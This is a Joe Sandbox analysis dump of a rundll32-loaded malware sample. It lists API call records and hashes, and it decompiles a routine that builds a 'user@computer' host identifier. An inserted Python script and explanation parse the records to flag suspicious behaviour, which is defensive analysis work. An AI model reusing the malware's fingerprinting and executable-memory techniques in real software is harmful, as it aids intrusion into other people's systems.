                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                            • String ID:
                                            • API String ID: 1727939831-0
                                            • Opcode ID: d5bc647cee192e607b6471f3d4a5fe1b8ec3a53609ee4ccb407143a45d002366
                                            • Instruction ID: b08465ad18f96f3984caa2eb00fbb9dc403e2d162be6e0d38c186e6292a60ee0
                                            • Opcode Fuzzy Hash: d5bc647cee192e607b6471f3d4a5fe1b8ec3a53609ee4ccb407143a45d002366
                                            • Instruction Fuzzy Hash: 265138B2A0020AAFDF11AFA9CC499AE7FBABF48214B048025FD14E7250DB35ED519F55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000), ref: 0580FEF9
                                            • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 0580FF8C
                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 0580FFE4
                                            • GetLastError.KERNEL32 ref: 05810016
                                            • GetLastError.KERNEL32 ref: 0581002A
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0581F51A,00000000,00000000,?,0580D3E9,?), ref: 0581003F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$memcpy
                                            • String ID:
                                            • API String ID: 2760375183-0
                                            • Opcode ID: c6e3ffe32c10316de58aa5d12a8e696d18ad7d5cdee22f38bf5043b4104ee7bf
                                            • Instruction ID: eb53dec062a4634e91498279f724763c8b3f0a1f4983f745c6cad7a32e3233a9
                                            • Opcode Fuzzy Hash: c6e3ffe32c10316de58aa5d12a8e696d18ad7d5cdee22f38bf5043b4104ee7bf
                                            • Instruction Fuzzy Hash: EF512CB1900249EFDF20DFA4DC88AAE7FB9FB04350F008429FD15E6150D7709E949B65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(?,00000020), ref: 05814A3B
                                            • lstrcat.KERNEL32(?,00000020), ref: 05814A50
                                            • lstrcmp.KERNEL32(00000000,?), ref: 05814A67
                                            • lstrlen.KERNEL32(?), ref: 05814A8B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3214092121-3916222277
                                            • Opcode ID: e2682f279393b7e99571cc7ae3909c97df3e7ab27b2f2e3e4390316906d2e06d
                                            • Instruction ID: 136362655bda40f1f0de0d071944f96ae923810e33a62f0201f723c9e3bb29a8
                                            • Opcode Fuzzy Hash: e2682f279393b7e99571cc7ae3909c97df3e7ab27b2f2e3e4390316906d2e06d
                                            • Instruction Fuzzy Hash: 3F51BF31B04218EBCF21CF99C484AADBBBAFF45315F15805AEC16DB221C770AE41CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID:
                                            • API String ID: 1659193697-0
                                            • Opcode ID: 5b3b8964864b46de1516e5c60e66718f7365077d3d827cf3e6eef50c0df7b8dc
                                            • Instruction ID: bb1f0f2a5735845368a86ea8659970303a625809d7960e929dbb755c50ff91e9
                                            • Opcode Fuzzy Hash: 5b3b8964864b46de1516e5c60e66718f7365077d3d827cf3e6eef50c0df7b8dc
                                            • Instruction Fuzzy Hash: 04412F75A0020AAFCB54EF99CC889AEB7FAFF98314B149929D915E3240D734ED44CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 05820AD0: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05820ADC
                                              • Part of subcall function 05820AD0: SetLastError.KERNEL32(000000B7,?,0581B14C), ref: 05820AED
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0581B16C
                                            • CloseHandle.KERNEL32(00000000), ref: 0581B244
                                              • Part of subcall function 058047FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                              • Part of subcall function 058047FF: CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                              • Part of subcall function 058047FF: GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 058047FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                              • Part of subcall function 058047FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                              • Part of subcall function 058047FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            • GetLastError.KERNEL32 ref: 0581B22D
                                            • ReleaseMutex.KERNEL32(00000000), ref: 0581B236
                                              • Part of subcall function 05820AD0: CreateMutexA.KERNEL32(05829208,00000000,?,?,0581B14C), ref: 05820B00
                                            • GetLastError.KERNEL32 ref: 0581B251
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                            • String ID:
                                            • API String ID: 1700416623-0
                                            • Opcode ID: de666324f16d1fcf476b196b6e82e18e6d3559f6f279039173a9556be1addce0
                                            • Instruction ID: ddce23ba3c45c8c949b37437f99c4661f5413fedcf604f641db02a35649a0b34
                                            • Opcode Fuzzy Hash: de666324f16d1fcf476b196b6e82e18e6d3559f6f279039173a9556be1addce0
                                            • Instruction Fuzzy Hash: 943182756102089FCB21AF78DC89DAE7FBAFB89301B248465FD17DB250DA319C44CB61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 0581B9BA
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,?,00000000,0581D73E,00000000), ref: 0581B9FC
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0581BA4E
                                            • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,0581D73E,00000000), ref: 0581BA67
                                              • Part of subcall function 05806706: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05806727
                                              • Part of subcall function 05806706: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0580676A
                                            • GetLastError.KERNEL32(?,00000000,0581D73E,00000000,?,?,?,?,?,?,?,0580BF69,?), ref: 0581BA9F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                            • String ID:
                                            • API String ID: 1921436656-0
                                            • Opcode ID: 5b644bfa912d10bdbbad2789ccf2be75eaf937971b1edf2d0da959f846b12e82
                                            • Instruction ID: c37608c4aac0358f260f556ecd63854f2cfce699d8dbb2940ff416a3284df656
                                            • Opcode Fuzzy Hash: 5b644bfa912d10bdbbad2789ccf2be75eaf937971b1edf2d0da959f846b12e82
                                            • Instruction Fuzzy Hash: 13313A71B01209AFDF61DFA9D885AAE7FBAFB04251F004065FD16E7251DB30AE40CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%
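The per-function records above are a flat rendering of the Joe Sandbox IDA plugin output, and the behaviours a practitioner cares about are spread across them: the `_snprintf`/`CreateProcessA`/`TerminateProcess` runner (API String ID 1481739438-0), the `OpenMutexA`/`CreateMutexA` check that sets `ERROR_ALREADY_EXISTS` (1700416623-0), and the `RtlImageNtHeader` routine that does a 16 MiB `VirtualAlloc` with `flProtect` 0x40 (1921436656-0). The Python below is an added example written for this page, not Joe Sandbox code or report output. It parses the record layout used above (bullet lines of the form `API.MODULE(args), ref: address`, subcall lines indented one level deeper, and the `API String ID` line closing a record) over a constructed sample copied from those three records, and flags four patterns: `VirtualAlloc` with `PAGE_EXECUTE_READWRITE`, `CreateProcessA` with `CREATE_NO_WINDOW` in `dwCreationFlags`, `SetLastError(0xB7)` beside a mutex open/create, and `CreateProcessA` paired with `TerminateProcess` in the same record. The rule names and the trimming of the sample are my choices; argument positions follow the Win32 prototypes.

```python
import re

# Constructed sample input: API lines copied from three function records in
# the report above (the _snprintf/CreateProcessA runner, the mutex and
# waitable-timer loop, and the RtlImageNtHeader/VirtualAlloc routine), trimmed
# to the calls the rules below examine. Layout follows the report: a record
# starts at "APIs", subcall lines are indented deeper, and "API String ID"
# is the last line of a record's Similarity section.
SAMPLE = """\
APIs
• lstrlen.KERNEL32(00000F00,?), ref: 0580B876
• RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0580B88F
• _snprintf.NTDLL ref: 0580B8B5
  • Part of subcall function 0580B968: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
  • Part of subcall function 0580B968: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
  • Part of subcall function 0580B968: TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
• HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0580B906
Memory Dump Source
• Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
Similarity
• API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
• API String ID: 1481739438-0
APIs
  • Part of subcall function 05820AD0: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 05820ADC
  • Part of subcall function 05820AD0: SetLastError.KERNEL32(000000B7,?,0581B14C), ref: 05820AED
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0581B16C
  • Part of subcall function 05820AD0: CreateMutexA.KERNEL32(05829208,00000000,?,?,0581B14C), ref: 05820B00
Similarity
• API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
• API String ID: 1700416623-0
APIs
• RtlImageNtHeader.NTDLL(00000000), ref: 0581B9BA
• VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,0581D73E,00000000), ref: 0581BA67
• GetLastError.KERNEL32(?,00000000,0581D73E,00000000,?,?,?,?,?,?,?,0580BF69,?), ref: 0581BA9F
Similarity
• API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
• API String ID: 1921436656-0
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE, optional "(args)", and the "ref: address" of the call site.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z_0-9]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
ID_RE = re.compile(r"^\s*•\s*API String ID:\s*(?P<id>[0-9]+-[0-9]+)\s*$")

# Win32 constants used by the rules (documented values).
PAGE_EXECUTE_READWRITE = 0x40
CREATE_NO_WINDOW = 0x08000000
ERROR_ALREADY_EXISTS = 0xB7


def parse_records(text):
    """Return a list of (api_string_id, calls); each call is a dict with
    api, mod, args (list of str), ref and sub (subcall function or None).
    Calls are accumulated until the record's API String ID line appears."""
    records, calls = [], []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append({"api": m.group("api"), "mod": m.group("mod"),
                          "args": args, "ref": m.group("ref"), "sub": m.group("sub")})
            continue
        m = ID_RE.match(line)
        if m:
            records.append((m.group("id"), calls))
            calls = []
    return records


def hexarg(call, index):
    """Argument `index` as an int, or None when the plugin printed '?' or the
    argument is absent. Rules must tolerate None: unknown is not zero."""
    try:
        return int(call["args"][index], 16)
    except (IndexError, ValueError):
        return None


def flag_record(calls):
    """Apply the behaviour rules to one record and return finding strings."""
    findings = []
    apis = {c["api"] for c in calls}
    for c in calls:
        if c["api"] == "VirtualAlloc" and hexarg(c, 3) == PAGE_EXECUTE_READWRITE:
            size = hexarg(c, 1)  # dwSize is the second argument
            tag = f"rwx-alloc:{c['ref']}"
            findings.append(tag + (f":size=0x{size:x}" if size is not None else ""))
        if c["api"] == "CreateProcessA":
            flags = hexarg(c, 5)  # dwCreationFlags is the sixth argument
            if flags is not None and flags & CREATE_NO_WINDOW:
                findings.append(f"hidden-child:{c['ref']}")
        if (c["api"] == "SetLastError" and hexarg(c, 0) == ERROR_ALREADY_EXISTS
                and apis & {"OpenMutexA", "CreateMutexA"}):
            findings.append(f"mutex-single-instance:{c['ref']}")
    if "CreateProcessA" in apis and "TerminateProcess" in apis:
        findings.append("spawn-then-kill")
    return findings


def scan(text):
    """Map each record's API String ID to its findings (empty list if none)."""
    return {rid: flag_record(calls) for rid, calls in parse_records(text)}


if __name__ == "__main__":
    for rid, found in scan(SAMPLE).items():
        print(rid, found or "-")
```

Two caveats apply when running this over a full report rather than the trimmed sample. Arguments the plugin could not resolve are printed as `?`, so `hexarg` returns `None` for them and a rule never treats unknown as zero. And because the report repeats "Part of subcall function" lines under every caller, a flag raised on a subcall (the `CreateProcessA` at 0580B9F1, for instance) will recur in each record that reaches that subcall; deduplicate on the `ref` address, not on the record, when counting behaviours.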

                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 05808DD2
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05808DEB
                                            • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 05808DF8
                                            • lstrlen.KERNEL32(0582A3A8,?,?,?,?,?,00000000,00000000,?), ref: 05808E0A
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 05808E3B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                            • String ID:
                                            • API String ID: 2734445380-0
                                            • Opcode ID: 577e3b78b5c5c79513b6d01695c21b5cdf4747fc94e95be7e57a711a057f86f5
                                            • Instruction ID: de26e2607a5c6bc0cccc2edb63bcdf827bd0327f614f60b233b617dabc007568
                                            • Opcode Fuzzy Hash: 577e3b78b5c5c79513b6d01695c21b5cdf4747fc94e95be7e57a711a057f86f5
                                            • Instruction Fuzzy Hash: 80313972500219AFDB61DF99DC89EEA7FA9EF44220F008514FD1992250DB74AA95CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581ACA0: RtlEnterCriticalSection.NTDLL(05829448), ref: 0581ACA8
                                              • Part of subcall function 0581ACA0: RtlLeaveCriticalSection.NTDLL(05829448), ref: 0581ACBD
                                              • Part of subcall function 0581ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 0581ACD6
                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 05802793
                                            • memcpy.NTDLL(00000000,?,?), ref: 058027A4
                                            • lstrcmpi.KERNEL32(00000002,?), ref: 058027EA
                                            • memcpy.NTDLL(00000000,?,?), ref: 058027FE
                                            • HeapFree.KERNEL32(00000000,00000000,?), ref: 05802844
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                            • String ID:
                                            • API String ID: 733514052-0
                                            • Opcode ID: 678f3bf01e109c26768584c05ecbe7ef7a874d593b6b374a1498fa8f3608512e
                                            • Instruction ID: 234b87c49c6fc0c7b64c59f9c793b50ba068fa9ef3549366e85da8bdba85dde2
                                            • Opcode Fuzzy Hash: 678f3bf01e109c26768584c05ecbe7ef7a874d593b6b374a1498fa8f3608512e
                                            • Instruction Fuzzy Hash: 0131B476A00208BFDB21AFA8DCCDAAE3FB9FB04254F145029FD06D3250D7759D848B90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F3268() {
                                            				long _v8;
                                            				long _v12;
                                            				int _v16;
                                            				long _t39;
                                            				long _t43;
                                            				signed int _t47;
                                            				short _t51;
                                            				signed int _t52;
                                            				int _t56;
                                            				int _t57;
                                            				char* _t64;
                                            				short* _t67;
                                            
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				GetUserNameW(0,  &_v8);
                                            				_t39 = _v8;
                                            				if(_t39 != 0) {
                                            					_v12 = _t39;
                                            					_v8 = 0;
                                            					GetComputerNameW(0,  &_v8);
                                            					_t43 = _v8;
                                            					if(_t43 != 0) {
                                            						_v12 = _v12 + _t43 + 2;
                                            						_t64 = E049F4DF6(_v12 + _t43 + 2 << 2);
                                            						if(_t64 != 0) {
                                            							_t47 = _v12;
                                            							_t67 = _t64 + _t47 * 2;
                                            							_v8 = _t47;
                                            							if(GetUserNameW(_t67,  &_v8) == 0) {
                                            								L7:
                                            								E049F4C73(_t64);
                                            							} else {
                                            								_t51 = 0x40;
                                            								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                            								_t52 = _v8;
                                            								_v12 = _v12 - _t52;
                                            								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                            									goto L7;
                                            								} else {
                                            									_t56 = _v12 + _v8;
                                            									_v12 = _t56;
                                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
                                            									_v8 = _t57;
                                            									if(_t57 == 0) {
                                            										goto L7;
                                            									} else {
                                            										_t64[_t57] = 0;
                                            										_v16 = _t64;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _v16;
                                            			}

                                             Instruction addresses (per decompiled statement, in listing order):
                                             0x049f3276 0x049f3279 0x049f327c 0x049f3282 0x049f3287 0x049f328d 0x049f3295 0x049f3298
                                             0x049f329e 0x049f32a3 0x049f32b0 0x049f32bd 0x049f32c1 0x049f32c3 0x049f32c7 0x049f32ca
                                             0x049f32da 0x049f332d 0x049f332e 0x049f32dc 0x049f32e1 0x049f32e2 0x049f32e7 0x049f32ea
                                             0x049f32fd 0x00000000 0x049f32ff 0x049f3302 0x049f3315 0x049f3318 0x049f331e 0x049f3323
                                             0x00000000 0x049f3325 0x049f3325 0x049f3328 0x049f3328 0x049f3323 0x049f32fd 0x049f3333
                                             0x049f3334 0x049f32a3 0x049f333a

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F327C
                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 049F3298
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetUserNameW.ADVAPI32(00000000,?), ref: 049F32D2
                                            • GetComputerNameW.KERNEL32(?,?), ref: 049F32F5
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 049F3318
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                            • String ID:
                                            • API String ID: 3850880919-0
                                            • Opcode ID: 0c17c1e4a3eb9facc0f316877800d0665f230253ee79d4ced200da5b5af82faf
                                            • Instruction ID: 1221701f76125864f58e232cffd8f854bbd8141d09f9fd10a0b49db90d54cf6d
                                            • Opcode Fuzzy Hash: 0c17c1e4a3eb9facc0f316877800d0665f230253ee79d4ced200da5b5af82faf
                                            • Instruction Fuzzy Hash: 2B210AB6900109FFDB11DFE9D9849EEBBBCEF44300B5444AAEA01E7240DB34AB04DB20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0581C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,05821538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0581C9CC
                                            • RtlEnterCriticalSection.NTDLL(05829448), ref: 0582154E
                                            • RtlLeaveCriticalSection.NTDLL(05829448), ref: 05821561
                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 05821572
                                            • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 058215DD
                                            • InterlockedIncrement.KERNEL32(0582945C), ref: 058215F4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                            • String ID:
                                            • API String ID: 3915436794-0
                                            • Opcode ID: d4ee10bd53e1498f879107940de896ae3edb6ba30e185317a0c3a05ececa3593
                                            • Instruction ID: 89ef0c9ecb81ebc79a092f5b6a4eef3761f0761d9c8761ab2784bd2064155292
                                            • Opcode Fuzzy Hash: d4ee10bd53e1498f879107940de896ae3edb6ba30e185317a0c3a05ececa3593
                                            • Instruction Fuzzy Hash: D7318B32A046259FCB208F68D84992ABFA9FB44725F158519FD56C3250DB30EC95CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0581601E,00000000,76CDF5B0,0581339A,?,00000001), ref: 05815E48
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05815E5D
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05815E79
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05815E8E
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05815EA2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$AddressProc
                                            • String ID:
                                            • API String ID: 1469910268-0
                                            • Opcode ID: 2fb974561ef9a9ba981731817d87dd7a04d14ab1348b4d612cdc8b8703c9d14b
                                            • Instruction ID: 9bcffaf95702a49fd5776080b42b6126b847aca38afda335c0ec05603e7dcf3a
                                            • Opcode Fuzzy Hash: 2fb974561ef9a9ba981731817d87dd7a04d14ab1348b4d612cdc8b8703c9d14b
                                            • Instruction Fuzzy Hash: 7D312B72A202109FDB20EB5AE88AE513FE9FB49320F058056FD48D7350DB78BD818F58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetUserNameW.ADVAPI32(00000000,0580AB98), ref: 0580E23D
                                            • GetComputerNameW.KERNEL32(00000000,0580AB98), ref: 0580E259
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetUserNameW.ADVAPI32(75BCC740,0580AB98), ref: 0580E293
                                            • GetComputerNameW.KERNEL32(0580AB98,?), ref: 0580E2B6
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,75BCC740,0580AB98,00000000,0580AB9A,00000000,00000000,?,?,0580AB98), ref: 0580E2D9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                            • String ID:
                                            • API String ID: 3850880919-0
                                            • Opcode ID: b10a5924ce0ca2fbb62e9bf076ff023f37c3acf936459e6da64e46485ea4505e
                                            • Instruction ID: 3b9216b4880a690e409a010fe418427acf34ab715ad0178bd9f0e027ce09afec
                                            • Opcode Fuzzy Hash: b10a5924ce0ca2fbb62e9bf076ff023f37c3acf936459e6da64e46485ea4505e
                                            • Instruction Fuzzy Hash: 7F21BA76900218FFDB21DFE9D9858AEBBBCEF44244B50446AE906E7244DA30AF44DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                            • DeleteFileA.KERNEL32(00000000,000004D2), ref: 05811081
                                            • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0581108A
                                            • GetLastError.KERNEL32 ref: 05811094
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05811153
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                            • String ID:
                                            • API String ID: 3543646443-0
                                            • Opcode ID: 8456ef453015fbe9a40be0e9788351b4a48fd90462fbf4fff5cd793026917ca7
                                            • Instruction ID: 74cd0fa9f366389cbadff9e08051d7bbb9f2b9abba116d839b2a94c52d122c03
                                            • Opcode Fuzzy Hash: 8456ef453015fbe9a40be0e9788351b4a48fd90462fbf4fff5cd793026917ca7
                                            • Instruction Fuzzy Hash: F12191B2711210BBDA60BBE6EC5DE8A3F9CEB56261B059121FF06C7150DA24AD40C7A6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058039E2: GetSystemTimeAsFileTime.KERNEL32(?), ref: 058039EE
                                              • Part of subcall function 058039E2: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05803A04
                                              • Part of subcall function 058039E2: _snwprintf.NTDLL ref: 05803A29
                                              • Part of subcall function 058039E2: CreateFileMappingW.KERNEL32(000000FF,05829208,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 05803A45
                                              • Part of subcall function 058039E2: GetLastError.KERNEL32 ref: 05803A57
                                              • Part of subcall function 058039E2: CloseHandle.KERNEL32(00000000), ref: 05803A8F
